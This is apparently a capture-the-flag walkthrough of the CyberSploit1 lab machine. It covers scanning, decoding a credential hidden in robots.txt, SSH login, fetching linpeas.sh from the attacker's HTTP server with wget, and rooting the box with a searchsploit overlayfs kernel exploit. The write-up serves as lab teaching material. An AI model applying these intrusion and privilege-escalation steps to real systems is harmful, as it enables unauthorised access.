# CyberSploit1 ## nmap ``` (base) [psdon@arch CyberSploit1]$ mkdir nmap (base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Real hackers hack time ⌛ [~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 192.168.217.92:22 Open 192.168.217.92:80 ``` A web server on port 80 is open

Let's checked the source code of the page, and we can find a possible username on there.

Let's also checked the `robots.txt` and as you can see, we have found a base64 encoded string

We can decode it by executing the following command ``` (base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode cybersploit{youtube.com/c/cybersploit} ``` ## Exploitation Let's try to log in using the username of `itsskv` and use the decoded string as a password ``` (base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92 This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts. itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit} itsskv@cybersploit-CTF:~$ ``` Looks like we have successfully gained an initial shell. Sweet :D ## Post Exploitation First, let's transfer `linpeas.sh` from our machine to the target machine ``` (base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/ (base) [psdon@arch linPEAS]$ ls builder images linpeas.sh README.md (base) [psdon@arch linPEAS]$ sudo python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` You can find the machine IP address by executing the following. ``` (base) [psdon@arch CyberSploit1]$ ip a | grep tun 5: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qle n 500 inet 192.168.49.217/24 scope global tun0 (base) [psdon@arch CyberSploit1]$ ``` Then transfer the script using `wget` ``` itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh --2021-08-27 02:16:13-- http://192.168.49.217/linpeas.sh Connecting to 192.168.49.217:80... connected. HTTP request sent, awaiting response... 200 OK Length: 458110 (447K) [application/x-sh] Saving to: `linpeas.sh' 100%[================================================================>] 4,58,110 147K/s in 3.0s 2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110] itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh ``` And now we can run `linpeas.sh` ``` itsskv@cybersploit-CTF:~$ ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------| | Become a Patreon : https://www.patreon.com/peass | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli & makikvues | |---------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------/ linpeas-ng by carlospolop ``` Right of the bat, you can see the version of the Linux Kernel it is running.

We can check this Linux Kernel version with `searchsploit` and I found out it is vulnerable to **overlayf** exploit.

## Privilege Escalation Let's mirror the exploit to our current working directory, and copy the content of the file to the clipboard

``` xclip -selection clipboard -i < 37292.c ``` And paste it to the target machine ``` nano e.c ```

We can compile the C source code using `gcc` binary installed in the target machine. And right after running the exploit, we got root in the target machine.

Thanks, and enjoy! :D